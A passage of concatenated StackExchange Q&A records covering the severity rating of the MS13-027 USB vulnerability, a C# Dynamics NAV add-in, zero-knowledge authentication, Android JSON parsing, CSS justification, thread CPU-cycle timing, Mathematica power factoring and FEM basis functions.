owned, or someone would need physical access to own a machine with no one logged in.\nComment: Interesting perspective. 
I hadn't considered the difficulty in what it would take to create malware to install a software device configured to appear as a USB host.\nAnswer: It is the same case of Redhat explaining in their blog post why they use CVSS and don't take into account the environment and temporal (time based) values. Your question is directly related to this same procedure.\nThe reason why microsoft has not flagged this as overall critical is because of the environmental factor. A lot of organizations already have physcial security in place with with zero tolerance for USB devices. Even if code execution is possible, it is not remote. Attacker needs to have physical access to the machine to trigger the bug. Although just plugging in a flash drive is fast, but I think if you have phyiscal access to the system, USB is not the only vector you can compromise.\nTherefore, taking into account the overall exploitation vector and the fact what new attack avenues this particular bug can introduce in an environment, the vulnerability is not rated as critical. \nComment: Per the SRD blog post \"This update represents an expansion of our risk assessment methodology to recognize vulnerabilities that may require physical access, but do not require a valid logon session\". Physical environment is now in scope for Microsoft advisories. I think @AJHenderson answered the question best.\n","meta":{"source":"security.stackexchange","title":"Is the aggregate severity rating of \"Important\" for MS13-027 too low?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Control Add-In for Nav Matrix of textbox(bidimensional) in C#\n\nQuestion: I need help creating a CtrlAddIn for Dynamics NAV using C#\nI am quite new to matrix and c#, i am using WinForm and VisualStudio to create a DLL. 
\nHere is part of the code:\nregion Fonctions pilot\u00e9es depuis Dynamics\n<code> \/\/ Tout effacer\n\n [ApplicationVisible]\n public void CleanPanel()\n {\n MainPanel.Controls.Clear(); \/\/Tous les elements seront effac\u00e9s\n }\n\n \/\/ Gestion des r\u00f4les\n\n [ApplicationVisible]\n public void AjouterRole(string NameL, string idRoleL, int posRoleL)\n { \n TextBox tb = new TextBox();\n \/\/Random random = new Random();\n ToolTip TTL = new ToolTip();\n String TooltipL;\n\n \/\/int randRed = random.Next(1, 255);\n \/\/int randGreen = random.Next(1, 255);\n \/\/int randBlue = random.Next(1, 255);\n\n \/\/tb.BackColor = Color.FromArgb(randRed, randGreen, randBlue);\n tb.BackColor = Color.Bisque;\n tb.Name = idRoleL;\n \/\/si le texte est plus grand, je mets ...\n tb.Text = NameL;\n if (tb.TextLength > 7)\n {\n string nameO = NameL.Substring(0, 7);\n string points = \"...\";\n tb.Text = string.Concat(nameO + points);\n }\n else\n {\n tb.Text = NameL;\n }\n tb.AllowDrop = true; \/\/pour le drag and drop \n tb.Multiline = true;\/\/pour pouvoir avoir des textboxes de taille differente\n tb.ScrollBars = ScrollBars.None; \/\/pour enlever les scrollbars dans tout les textboxes\n tb.HideSelection = true;\/\/pour ne pas avoir le focus dans le precedent textbox\n tb.Size = new Size(70, 60);\n tb.Left = posRoleL * 70;\n tb.Visible = true;\n tb.Cursor = Cursors.Hand;\n \/\/wrap pour que le texte n'aille pas a la ligne et tooltip pour voir le text\n TooltipL = NameL;\n tb.WordWrap = false;\n TTL.SetToolTip(tb, TooltipL);\n \/\/evenement pour le DRAG AND DROP\n \/\/1 Je gere le drag pour pouvoir le bouger\n tb.MouseDown += (senderL, eL) => tb.DoDragDrop(tb.Text, DragDropEffects.Move);\n tb.DragEnter += (senderL, eL) => { eL.Effect = DragDropEffects.Move; };\n \/\/EventControlAddin(3, idRoleL.PadRight(10) + \";\" + (string)posRoleL.ToString());\n \/\/2 Je gere le drop pour pouvoir bouger le controle\n tb.DragDrop += (senderL, eL) => { tb.Text = eL.Data.GetData(DataFormats.Text).ToString(); EventControlAddin(3, idRoleL.PadRight(10) + \";\" + (string)posRoleL.ToString()); };\n \/\/evenement pour pouvoir supprimer un role\n tb.MouseEnter += IlumineRole;\n tb.MouseLeave += Eteint;\n \/\/evenement pour modifier le role\n tb.DoubleClick += (senderL, eL) => EventControlAddin(6, tb.Name);\n\n MainPanel.Controls.Add(tb);\n\n }\n\n [ApplicationVisible]\n public void AjouterTotalRole(string NameL, string idRoleL, int posRoleL, string dureeL, string coutL)\n { \n \/\/ Textbox\n TextBox tb = new TextBox();\n tb.Name = idRoleL;\n tb.Text = NameL;\n int indexMaxRoles = 99;\/\/somme de toutes les lignes + 1 \n \/\/ Je dois mettre un tooltip pour comprendre\n ToolTip TTL = new ToolTip();\n String TooltipLCout = \"Totaux des r\u00f4les en dur\u00e9e et en co\u00fbt.\";\n \/\/Panel contenant les labels\n Panel pn = new Panel();\n pn.Size = new Size(70, 60);\n pn.BackColor = Color.Azure;\n pn.BorderStyle = BorderStyle.FixedSingle;\n pn.Left = posRoleL * 70;\n pn.Top = indexMaxRoles + 1; \/\/Il faut qu'il soit a la casse finale\n\n Label lb_Duree = new Label(); \n lb_Duree.Text = \"Dur\u00e9e:\" + dureeL;\n \/\/lb_Duree.Width = 60;\n Label lb_Cout = new Label();\n lb_Cout.Text = \"Co\u00fbt:\" + coutL;\n \/\/lb_Cout.Width = 60;\n lb_Cout.Top = 20;\n\n TTL.SetToolTip(pn, TooltipLCout);\n pn.Controls.Add(lb_Duree);\n pn.Controls.Add(lb_Cout);\n MainPanel.Controls.Add(pn);\n }\n<\/code>\nI need to add the total of the rows and columns as TotalRoles and TotalOperations, and i need to pass to dynamics the lastposition of my 
textboxes in horizontal and vertical, + 1 for getting the right position. How can i do this? Any help most welcome. Thanks\nComment: Is this for a Silverlight control? We need more details about where exactly the code is going to execute.\nComment: Hi Nicknow, the code is going to execute as a CtrlAddIn for NAV 2013 CRM.\nComment: Okay, so what part of your question is specific to Dynamics CRM? Also, you should add the Dynamics NAV (I'll do an edit for you) to get the right audience.\nComment: C'est quoi ce commentaire en espagnol quand les autres sont en fran\u00e7ais ? (et au mieux, pour ici, les mettre en anglais).\nComment: traduce : WTF is that spanish comment when all others are in french ? Better to do all in english when posting on Stackoverflow.\nComment: First comment: \"changing the properties to do the table as i want\"\nComment: Second comment: \"I have to delete the space left after dimensioning the cells\"...\nAnswer: The control add-in should render the same as a Custom Control in Visual Studio, however there may be some default margins applied. Check that your margin property is set on your textboxes to explicitly set it to zero.\nAlso, put your controls inside a better container such as a Panel, TableLayoutPanel or FlowLayoutPanel. These more specialized controls should make it easier to arrange the child elements without having to manually calculate positions, etc.\nMatrix Forms in RTC\nDynamics NAV already has the ability to display matrix-style forms -- is there a particular use-case where a custom matrix add-in would be more applicable? Distributing a client-side control add-in DLL to all users can be difficult to debug and maintain.\nThere are walkthroughs on MSDN which explain the process of migrating the classic Matrix forms to the RTC client if that is your underlying objective.\nComment: Developing RoleTailored Client Control Add-ins, this is what i am doing. I explain: I have a main panel, Inside it i want to add some other panels that will contain arrays of textboxes, one of them will be bidimensional and the rest unidimensionals arrays. But my problem is that i can't see the elements Inside the panels. I can see all the panels but no the elements.\nComment: Without any sample code, it's difficult to say. I'd make sure you're adding your panels to the parent control. Try adding something basic like a label to ensure they're displaying at all. More documentation can be found on MSDN -- http:\/\/msdn.microsoft.com\/en-us\/library\/dd983826(v=nav.70).aspx\nComment: i have just refresh my code for you too see, thanks for any help\n","meta":{"source":"stackoverflow","title":"Control Add-In for Nav Matrix of textbox(bidimensional) in C#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Public key authentication as zero-knowledge proof?\n\nQuestion: I've been reading up a bit on zero-knowledge proofs and how they are applied to authentication, specifically the PAKE protocol and the SRP and OPAQUE implementations. From my (limited) understanding this seems similar to Public Key authentication (for example as used as a means of authentication in SSH) or Personal Access Tokens (as used in most Git platforms like Gitlab, Github, Bitbucket or Azure). Could one therefore state that Public Key authentication is an example of zero-knowledge proofs? Or am I missing something here? 
Does the public key convey some knowledge of the private key?\nComment: I googled your question title and this was the first hit: https:\/\/doubleoctopus.com\/security-wiki\/protocol\/zero-knowledge-proof\/#:~:text=One%20example%20for%20zero%2Dknowledge,the%20prover%20has%20the%20key.\nComment: Yes, they state \"One example for zero-knowledge authentication is when a prover has an asymmetric key-pair (e.g. RSA, EC)\", though I've read (or understood) otherwise in other places. Eg [here](https:\/\/crypto.stackexchange.com\/questions\/35177\/is-using-digital-signatures-to-prove-identity-a-zero-knowledge-proof) (not the same question, but similar) there are comments regarding \"I want to prove to YOU (...), but I don't want you to be able to convince anyone else that you interacted with (me)\"\nAnswer: Could one therefore state that Public Key authentication is an example of zero-knowledge proofs?\nYes and No, it is related to but still distinct from a zero-knowledge proof.\nI think the discussion https:\/\/www.reddit.com\/r\/crypto\/comments\/75quwb\/how_is_a_zeroknowledge_proof_different_than_rsa\/ will answer your question.\nIn <code>public key authentication<\/code>, the scheme is based on public key cryptography, using cryptosystems where encryption and decryption are done using separate keys, and it is not feasible to derive the decryption key from the encryption key. Each user creates a public\/private key pair for authentication purposes. The server knows the public key, and only the user knows the private key.\nIn cryptography, a <code>zero-knowledge proof<\/code> or zero-knowledge protocol is a method by which one party (the prover) can prove to another party (the verifier) that a given statement is true while the prover avoids conveying any additional information apart from the fact that the statement is indeed true.\nZero-knowledge authentication is when a prover convinces a verifier that she is in possession of an identifying secret, without revealing the secret itself.\nAn example of that could be using an asymmetric private-public key pair, with the private key acting as the verifier of the information requested. The verifier sends a challenge or request using the public key, and the prover responds using the private key to confirm the information. The public-private key \"handshake\" convinces the verifier that the prover's key meets the criteria, resulting in successful authentication.\nSome refer to this as ZKKSP: https:\/\/coingeek.com\/zero-knowledge-key-statement-proof\/\nSee more here:\n\nhttps:\/\/github.com\/matter-labs\/awesome-zero-knowledge-proofs\nhttps:\/\/crypto.stackexchange.com\/questions\/89875\/are-zero-knowledge-proofs-alternative-private-key-encryption\nhttps:\/\/crypto.stackexchange.com\/questions\/92178\/zero-knowledge-rsa-public-key\nhttps:\/\/crypto.stackexchange.com\/questions\/64059\/are-ssh-key-pairs-an-example-of-a-zero-knowledge-proof\nhttps:\/\/crypto.stackexchange.com\/questions\/10595\/when-would-one-prefer-a-proof-of-knowledge-instead-of-a-zero-knowledge-proof?rq=1\nhttps:\/\/crypto.stackexchange.com\/questions\/25338\/why-arent-zero-knowledge-proofs-used-in-practice-for-authentication?rq=1\nComment: To me the Reddit post doesn't answer very much - they seem to have gone off on a bit of a tangent (I understand the poster probably was asking a similar question to mine, but the answers seem to compare PK auth with ZKP in general, not ZKP auth in particular). However _your_ answer is much more helpful. 
PK auth would basically be a ZKKSP protocol, no? I find it strange it is never really mentioned as such, considering the interest in ZKP.\nComment: And, if I understand correctly, even if PK auth is zero-knowledge, protocols like SRP\/OPAQUE are interesting from a usability point of view (especially on the web) as the user doesn't need to save a private key anywhere or keep it safe.\n","meta":{"source":"security.stackexchange","title":"Public key authentication as zero-knowledge proof?","dup_signals":{}},"subset":"stackexchange"} +{"text":"extracting value from a JSONArray in Android\n\nQuestion: I have this JSON Object\n<code>{\n\"kind\": \"books#volumes\",\n \"totalItems\": 482,\n \"items\": [\n {\n \"kind\": \"books#volume\",\n \"id\": \"MoXpe6H2B5gC\",\n \"etag\": \"6dr4Ka3Iksc\",\n \"selfLink\": \"https:\/\/www.googleapis.com\/books\/v1\/volumes\/MoXpe6H2B5gC\",\n \"volumeInfo\": {\n \"title\": \"Android in The Attic\",\n \"authors\": [\n \"Nicholas Allan\"\n ],\n \"publisher\": \"Hachette UK\",\n \"publishedDate\": \"2013-01-03\",\n \"description\": \"Aunt Edna has created a no-nonsense nanny android to make sure Billy and Alfie don't have any fun. But then Alfie discovers how to override Auntie Anne-Droid's programming and nothing can stop them eating all the Cheeki Choko Cherry Cakes they like ... until the real aunt Edna is kidnapped!\",\n<\/code>\nI have to extract 3 keys \"title\", \"author\", and \"description\" by this code snippet:\n<code>JSONObject baseJsonResponse = new JSONObject(bookJSON);\n\n \/\/ Extract the JSONArray associated with the key called \"features\",\n \/\/ which represents a list of features (or books).\n JSONArray bookArray = baseJsonResponse.getJSONArray(\"items\");\n\n \/\/ For each book in the bookArray, create an {@link book} object\n for (int i = 0; i < bookArray.length(); i++) {\n\n \/\/ Get a single book at position i within the list of books\n JSONObject currentBook = bookArray.getJSONObject(i);\n\n \/\/ For a given book, extract the JSONObject associated with the\n \/\/ key called \"volumeInfo\", which represents a list of all volumeInfo\n \/\/ for that book.\n JSONObject volumeInfo = currentBook.getJSONObject(\"volumeInfo\");\n\n \/\/ Extract the value for the key called \"title\"\n String title = volumeInfo.getString(\"title\");\n\n \/\/ Extract the value for the key called \"authors\"\n String authors = volumeInfo.getString(\"author\");\n\n \/\/ Extract the value for the key called \"description\"\n String description = volumeInfo.getString(\"description\");\n<\/code>\nThe \"title\" and \"description\" worked fine, but the author part didn't. As I can see, \"author\" is actually an JSONArray, so my output on screen is\n<code>[\"Nicholas Allan\"]\n<\/code>\nwhich is not what I desired. So, I tried to change my approach and extract the element by this code\n<code>JSONArray author = volumeInfo.getJSONArray(\"authors\");\n String authors = author.get(0);\n<\/code>\nBut Android Studio said the input of method get() must be a String.\nI'm new to JSON and Android so I have never seen a JSON key without a value like this one. Can anyone tell me how can I extract an element from a JSONArray?\nAnswer: Since the <code>get()<\/code> method returns an Object, you would need to cast it to a String:\n<code>String authors = (String) author.get(0);\n<\/code>\nAlternatively, you could use JSONArray's <code>getString(index)<\/code> method, where <code>0<\/code> is the index. 
\n<code>JSONArray author = volumeInfo.getJSONArray(\"authors\");\nString authors = author.getString(0);\n<\/code>\n","meta":{"source":"stackoverflow","title":"extracting value from a JSONArray in Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"text-align justify not working\n\nQuestion: I'm trying to justify the text within this p tag so that it perfectly fits the width of the p.\n<code><p align=\"justify\" style=\"text-align: justify !important; color:#fff; margin:0px; font-weight:bold; width:487px; border:Solid 1px red;\">blah blah blah<\/p>\n<\/code>\nbut the text just wont justify! any idea why? \nthanks for any help.\nAnswer: You can use the solution described here:\nhttp:\/\/blog.vjeux.com\/2011\/css\/css-one-line-justify.html\nThis will justify a single line but adds a space after, so if you know the height, you can specify it with <code>overflow:hidden<\/code> to conceal it and still get the justification.\n\n<code>.fulljustify {\n text-align:justify;\n }\n .fulljustify:after {\n content: \"\";\n display: inline-block;\n width: 100%; \n }\n #tagline {\n height: 80px;\n overflow: hidden;\n line-height: 80px; \/* vert-center *\/\n }<\/code>\n<code><p id=\"tagline\" class=\"fulljustify\">Blah blah blah<\/p><\/code>\nComment: For a single line, this\nComment: this doesn't work in IE8 and FF lower versions. do you know some way to implement without using `:after` pseudo code and `content`? thanks\nAnswer: If your text doesn't span more than one line, justifying doesn't do anything. Your text has to wrap to the next line, and then the FIRST line will be justified, but not the second.\nComment: darn. so theres no css way to justify 4 words in a 487 width p?\nComment: is correct. You also needed to change the `color` from white on a white background to see this. http:\/\/jsfiddle.net\/5RpQr\/\nComment: @jason gennaro - yeah, i spent a minute trying to figure out why i didn't see anything in the fiddle... haha\nComment: .haha\n\n@phil, see my answer for a possible other solution re justifying four words\nComment: Wow, that's really confusing, e.g. when in ckeditor setting the first line to justify, you won't see any changes. I wasted an hour figuring that out, thinking the plugin was broken. Hah!\nAnswer: Chrome doesn't support it but in Firefox and IE, you can use <code>text-align-last: justify;<\/code>. For a cross-browser solution, we have to use what @onemanarmy posted ;)\nComment: As of Dec 2016, this is now supported in all major browsers (65%) and is the best solution.\nComment: Doesn't work in Safari. It's the default browser on OS X, so I'd consider it a major browser.\nComment: Yes, this is now the best (and simplest) solution.Works great in chrome.\nComment: This is the solution I was looking for. Works in chrome too. Thanks a lot\nAnswer: If you wanted to justify four words in <code>487px<\/code> you could try using <code>word-spacing<\/code> in your <code>css<\/code>.\nI used <code>word-spacing:8em;<\/code> for <code>bla bla bla bla<\/code> but you could adjust as necessary.\nhttp:\/\/jsfiddle.net\/5RpQr\/1\/\nComment: @phil - Just remember that if you change your words, the word spacing must change too\nAnswer: try this\nfor div\n<code>div {\ntext-align:justify;\ntext-justify: inter-word;\ntext-align-last:center;\n\/* for IE9 *\/\n-ms-text-align-last:center;\n}\n<\/code>\nComment: thanks, you saved my bacon. 
I love how these CSS styles were created without any planning, by pushing it forward with the belly.\nAnswer: There is also something similar, like display: flex; justify-content: space-around; if you would wrap those texts in spans or divs\nAnswer: In my case for < p > tag, works with easy way:\n<code>p {\n text-align: justify;\n text-justify: inter-word;\n}\n<\/code>\nhttps:\/\/css-tricks.com\/almanac\/properties\/t\/text-justify\/\nAnswer: To make it look good on Chrome & opera (multiline justify looks bad on them)\nI use the following\n<code>.fulljustify {\n text-align: justify;\n display: table-row;\n text-align-last: left;\n}\n<\/code>\nAnswer: Chrome solution:\nIf you don't want to mess with the display properties (in my case aligning an anchor tag of a carousel img):\n<code>text-align: -webkit-center;<\/code>\nComment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](\/help\/how-to-answer).\nAnswer: It worked for me this way:\n<code><div className={s.element}> {text} <\/div>\n\n.element {\n text-align:justify;\n word-wrap: break-word;\n hyphens: auto;\n}\n<\/code>\nAnswer: You better try \n<code>style=\"text-align:justifty;display:inline-block;\"\n<\/code>\nAnswer: Just use <code>style=\"text-align:justify\"<\/code>.\nIt works in all browsers.\nComment: some kind of explanation would be helpful, won't it? he obiviously used your styles...\nComment: @Ron If you want to justify whole paragraph except last row use above trick, and if you want to justify last line also then use ` .justify:after{content: \"\"; display: inline-block; width: 100%;}` and no need to define height.\nComment: he already use the inline css with `text-align: justify` , Please reconsider to give op solution.\n","meta":{"source":"stackoverflow","title":"text-align justify not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"Measure CPU cycles of a Function Call\n\nQuestion: I'm looking for a way to measure the cpu cycles a function call on a thread takes.\nExample pseudo code:\n<code>void HostFunction()\n{\n var startTick = CurrentThread.CurrentTick; \/\/does not exist\n\n ChildFunction();\n\n var endTick = CurrentThread.CurrentTick; \/\/does not exist\n\n var childFunctionCost = endTick - startTick;\n}\n\nvoid ChildFunction() \n{\n \/\/Do whatever...\n\n Thread.Sleep(3000);\n\n \/\/Do some more...\n}\n<\/code>\nI don't want to use a Stopwatch or some other time measurement, because it would include any time that the thread is sleeping, which I do not want to measure. I only want to measure real work.\nThis measurement needs to work at runtime, as in my pseudo code, as the results are used to determine if the child function should be allowed to continue to run (my real case is a plugin-type architecture), so a profiling tool won't help me.\nComment: consider this solution (GetThreadTimes): http:\/\/stackoverflow.com\/questions\/26472936\/why-does-getthreadtimes-return\/26475906#26475906 (not the code, just the calls) The code is in serious need of help, but the breakdown of the results might be of interest.\nComment: Is there anything that prevents the plug-in from spawning additional threads and\/or using the threadpool? 
If not then basing scheduling on current thread times will not yield the desired result.\nComment: @BrianRasmussen, yes I am using Mono.Cecil to scan all the Type Refs, and if any namespaces\/types that manage threads are used, it's automatically excluded.\nComment: Thank you all for your answers. I think I'll end up going with the solution by @HansPassant, as it appears to return the value in cycle units (not time units). For my case, my plugin spec requires a fixed number of allowed cycles for the child function call, regardless of the speed of the CPU, so based on my limited understanding on this subject, I'm figuring that cycles would be the better way to do that.\nAnswer: You can pinvoke QueryThreadCycleTime(). Check the link for details.\nSome sample code:\n<code>using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\n\nclass Program {\n static void Main(string[] args) {\n ulong start, end;\n start = NativeMethods.GetThreadCycles();\n System.Threading.Thread.Sleep(1000);\n end = NativeMethods.GetThreadCycles();\n ulong cycles = end - start;\n Debug.Assert(cycles < 200000);\n }\n\n static class NativeMethods {\n public static ulong GetThreadCycles() {\n ulong cycles;\n if (!QueryThreadCycleTime(PseudoHandle, out cycles))\n throw new System.ComponentModel.Win32Exception();\n return cycles;\n }\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n private static extern bool QueryThreadCycleTime(IntPtr hThread, out ulong cycles);\n private static readonly IntPtr PseudoHandle = (IntPtr)(-2);\n\n }\n}\n<\/code>\nComment: @HansPassant Just out of curiosity, how did you come up with the PseudoHandle? Is there a documentation of that value?\nComment: Do you know if the value returned by this function is updated in (near) real-time or does it suffer the same issue that GetThreadTimes has namely that it only gets updated on a clock interrupt?\nComment: Easy to try for yourself, just call it twice. Yes.\nComment: Good point. Sorry for being lazy. It does indeed get updated on every call, as far as I can tell.\nComment: No, it is secret knowledge. You can ask a question about it :)\nComment: @HansPassant You are quite cruel... It took me at least 20 minutes to discover what *-2* is... 
It is quite hidden :-) and since hans was cruel, I'll tell everyone that *-2* is the what `GetCurrentThread()` always returns (see for example http:\/\/blogs.msdn.com\/b\/oldnewthing\/archive\/2014\/10\/15\/10564700.aspx where it is explained in the comments)\nAnswer: Based on the comment I provided above, consider the following code:\n<code>using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing System.Threading;\n\nnamespace FunctionTiming\n{\n class Program\n {\n private static Thread _thread;\n private static IntPtr _threadHandle;\n\n static void Main(string[] args)\n {\n _thread = new Thread(new ThreadStart(Program.TargetFunction));\n _thread.Start();\n _thread.Join();\n\n System.Runtime.InteropServices.ComTypes.FILETIME start, end, rawKernelTime, rawUserTime;\n bool result = GetThreadTimes(_threadHandle, out start, out end, out rawKernelTime, out rawUserTime);\n Debug.Assert(result);\n\n ulong uLow = (ulong)rawKernelTime.dwLowDateTime;\n ulong uHigh = (uint)rawKernelTime.dwHighDateTime;\n uHigh = uHigh << 32;\n long kernelTime = (long)(uHigh | uLow);\n\n uLow = (ulong)rawUserTime.dwLowDateTime;\n uHigh = (uint)rawUserTime.dwHighDateTime;\n uHigh = uHigh << 32;\n long userTime = (long)(uHigh | uLow);\n\n Debug.WriteLine(\"Kernel time: \" + kernelTime);\n Debug.WriteLine(\"User time: \" + userTime);\n Debug.WriteLine(\"Combined raw execution time: \" + (kernelTime + userTime));\n\n long functionTime = (kernelTime + userTime) \/ 10000;\n Debug.WriteLine(\"Funciton Time: \" + functionTime + \" milliseconds\");\n }\n\n static void TargetFunction()\n {\n IntPtr processHandle = GetCurrentProcess();\n bool result = DuplicateHandle(processHandle, GetCurrentThread(), processHandle, out _threadHandle, 0, false, (uint)DuplicateOptions.DUPLICATE_SAME_ACCESS);\n\n double value = 9876543.0d;\n for (int i = 0; i < 100000; ++i)\n value = Math.Cos(value);\n\n Thread.Sleep(3000);\n\n value = 9876543.0d;\n for (int i = 0; i < 100000; ++i)\n value = Math.Cos(value);\n }\n\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n static extern bool GetThreadTimes(IntPtr hThread,\n out System.Runtime.InteropServices.ComTypes.FILETIME lpCreationTime, out System.Runtime.InteropServices.ComTypes.FILETIME lpExitTime,\n out System.Runtime.InteropServices.ComTypes.FILETIME lpKernelTime, out System.Runtime.InteropServices.ComTypes.FILETIME lpUserTime);\n\n [DllImport(\"kernel32.dll\")]\n private static extern IntPtr GetCurrentThread();\n\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n [return: MarshalAs(UnmanagedType.Bool)]\n static extern bool DuplicateHandle(IntPtr hSourceProcessHandle,\n IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle,\n uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);\n\n [Flags]\n public enum DuplicateOptions : uint\n {\n DUPLICATE_CLOSE_SOURCE = (0x00000001),\/\/ Closes the source handle. This occurs regardless of any error status returned.\n DUPLICATE_SAME_ACCESS = (0x00000002), \/\/Ignores the dwDesiredAccess parameter. 
The duplicate handle has the same access as the source handle.\n }\n\n [DllImport(\"kernel32.dll\")]\n static extern IntPtr GetCurrentProcess();\n }\n}\n<\/code>\nwhich produces the following result (on my older machine):\n<code>Kernel time: 0\nUser time: 156250\nCombined raw execution time: 156250\nFunction time: 15 milliseconds\n<\/code>\nYou can clearly see that the 3 seconds of sleeping is not being included.\nHope this helps.\nComment: You can't get better resolution than the clock tick interrupt rate. Default is 64 interrupts\/second. Or 15.625 msec, as you can tell.\nComment: @Jeff, Thanks for your answer. Compared to Hans' answer though, it looks rather complex. Is there any benefit to using this one compared to his? Hans, same question.\nComment: @NathanA - Both strategies can provide sufficient results. And the code above is verbose, and can be abstracted how you like. The intent was simply to provide straight forward code that will compile that you can test with.\nComment: @NathanA - After testing with the code Hans provided, I agree. It is a better solution, and I am glad that he provided it.\n","meta":{"source":"stackoverflow","title":"Measure CPU cycles of a Function Call","dup_signals":{}},"subset":"stackexchange"} +{"text":"can I expand non-integer powers\n\nQuestion: How can I help Mma to recognize that <code>w<\/code> can be factored out of <code>(a w)^a (w - a w)^(1 - a)<\/code>. Assumptions: w>0 and 1>a>0.\nComment: `FullSimplify[ExpandAll[(a w)^a (w - a w)^(1 - a)] , {w > 0 , 1 > a > 0}]` gets the `w` outside.\nComment: @Coolwater Thanks. I had tried this with `PowerExpand` instead of `ExpandAll`, and that did not work.\nAnswer: <code>Assuming[w > 0 && 1 > a > 0, \n Collect[(a w)^a (w - a w)^(1 - a), w, Simplify]]\n<\/code>\n$\\ $ <code>(1 - a)^(1 - a) a^a w<\/code>\n\n<code>Simplify[Cancel[(a w)^a (w - a w)^(1 - a)], Assumptions -> w > 0 && 1 > a > 0]\n<\/code>\n$\\ $ <code>-(-1 + a) (a\/(1 - a))^a w<\/code>\n \n<code>Simplify[Together[(a w)^a (w - a w)^(1 - a)], Assumptions -> w > 0 && 1 > a > 0]\n<\/code>\n$\\ $ <code>-(-1 + a) (a\/(1 - a))^a w<\/code>\n\n<code>Simplify[Factor[(a w)^a (w - a w)^(1 - a)], Assumptions -> w > 0 && 1 > a > 0]\n<\/code>\n$\\ $ <code>-(-1 + a) (a\/(1 - a))^a w<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"can I expand non-integer powers","dup_signals":{}},"subset":"stackexchange"} +{"text":"Piecewise Continuous Linear Basis on a Triangular Mesh\n\nQuestion: Question\nGiven a FEM mesh, I would like to define a set of basis functions \nanchored to the mesh, so that any piecewise linear continuous function on the mesh can be expanded over that set.\nSuch a basis is possibly called <code>ElementShapeFunction<\/code> in the FEM framework?\nAttempt\nLet us consider \n<code>mesh0 = ToElementMesh[RegionUnion[Disk[], Rectangle[{0, 0}, {2, 2}]], \n MaxCellMeasure -> 0.125, AccuracyGoal -> 1, \n MeshQualityGoal -> \"Maximal\",\n \"MeshOrder\" -> 1, \"MeshElementType\" -> TriangleElement]\n<\/code>\nGiven this mesh, I should be able to construct a set linear piecewise \ngeneralisation of indicator function (pyramide-like) \nwhich should look like this: \n\nwhere the top dark red vertex is above the middle red vertex.\n\nI understand that the FEM tools allow me to identify the triangles\n<code>me = mesh0[\"MeshElements\"][[1, 1]]; nn = Length[me];\nTable[{Hue[i\/nn], Polygon@mesh0[\"Coordinates\"][[me[[i]]]]}, {i, nn}] \/\/ Graphics\n<\/code>\n\nThanks to @user21, I also gathered how to extract the linear piecewise function \non a 
regular (unit) triangle \n<code>Table[Table[{r, s, \n ElementShapeFunction[TriangleElement, 1][r, s][[i]]},\n {s, 0, 1, 1\/100}, {r, 0, s, 1\/100}] \/\/ Flatten[#, 1] & \/\/ \n ListContourPlot[#, Axes -> True] &,\n {i, 3}]\n<\/code>\n\nI also vaguely recall that the transformation to the \nregular triangle involve the inverse of $$ \\left(\n\\begin{array}{ccc}\n 1 & 1 & 1 \\\\\n x_1 & x_2 & x_3 \\\\\n y_1 & y_2 & y_3 \\\\\n\\end{array}\n\\right)$$\nwhere the $(x_i,y_i)$ are the coordinates of the 3 vertices of the triangles.\nSo in principle I am all set to define my basis function.\nBut my target to have a basis which is consistent with the way \nthings are done within the FEM package. This I cannot easily do with some help\nfrom people who know its internals. I truly believe this basis could be useful\nto many projects, beyond my own, especially if it is consistent with the logic of \nthe package.\n\nSo I am after a function which would take mesh as an argument \n and return a list of $\\cal N_i$ functions such as plotted above,\n so that any linear function on the mesh can be written unambiguously as a sum over these.\n\nThe format of these functions should ideally generalise that of the existing <code>BSplineFunction<\/code> for triangular meshes. Internally they should correspond to a piecewise description of the linear interpolation over the relevant triangles. \n\nOne complication I can see arises from e.g. the top left blue triangle which is not part of a polyhedra. \nIdeally one wants to have special basis elements on the edges which can be non zero, or with a given slope. \n\nThe latter requirement is possibly achieved by counting the outer vertex as \na double (or triple) knot, as is done for BSplines? \nEventually, this basis could be replacing the constant piecewise function, or for a regular mesh those presented in this answer .\nComment: To put that hat function on \"the right hand side\" of the equation (and that's what I guess is what you are about to do), it typically suffices to multiply the corresponding vector my the mass matrix (and to adjust the boundary degrees of freedom to match the boundary conditions). At least, that's the case for typical elliptic equations.\nComment: The point to efficiency in the finite element method is to avoid explicit representations of the basis functions, but to work only with the coordinates with respect to such a basis. If you generate your mesh with `ToElementMesh` with `MeshOrder->1` then mass and stiffness matrix are already assembled with respect to this basis. If you have $n$ vertices, then the \"hat function\" of vertex $i$ ($=1$ at that vertex, $=0$ at all other vertices and piecewise linear in between) is represented by the `i`-th basis vector of the standard basis on $\\mathbb{R}^n$.\nComment: @HenrikSchumacher you know better than me, BUT it seems to me that mathematica has both `LinearInterpolation` and `BSplineBasis` which serve different purpose. And I am trying to implement 1-Spline on a triangular mesh because you showed me how to write Laplacian Penalty function on such basis :-)\nComment: @HenrikSchumacher re':it typically suffices to multiply' please please please could you give an example while answering this question https:\/\/mathematica.stackexchange.com\/questions\/216747\/inverting-differential-equation-using-finite-element-methods? I apologise to be so clueless about FEM.\nComment: Even if it is inefficient it could be educationally useful to be able to access such basis? 
